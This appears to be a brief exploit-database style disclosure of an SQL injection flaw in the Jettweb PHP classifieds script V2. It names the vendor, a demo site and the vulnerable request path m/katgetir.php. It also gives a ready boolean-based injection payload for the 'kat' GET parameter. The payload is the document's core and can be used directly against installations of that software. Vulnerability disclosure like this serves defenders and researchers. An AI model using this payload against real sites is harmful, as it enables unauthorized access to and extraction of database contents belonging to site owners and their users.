Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection

Date: 25.03.2019

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html

Demo Site: http://ilanv2.proemlaksitesi.net

Version: V2

Tested on: Kali Linux

CVE: N/A

—– PoC : SQLi —–

Request: http://localhost/[PATH]/m/katgetir.php?kat=1 Vulnerable Parameter: kat (GET) Payload: kat=1’ OR NOT 1300=1300– rwTf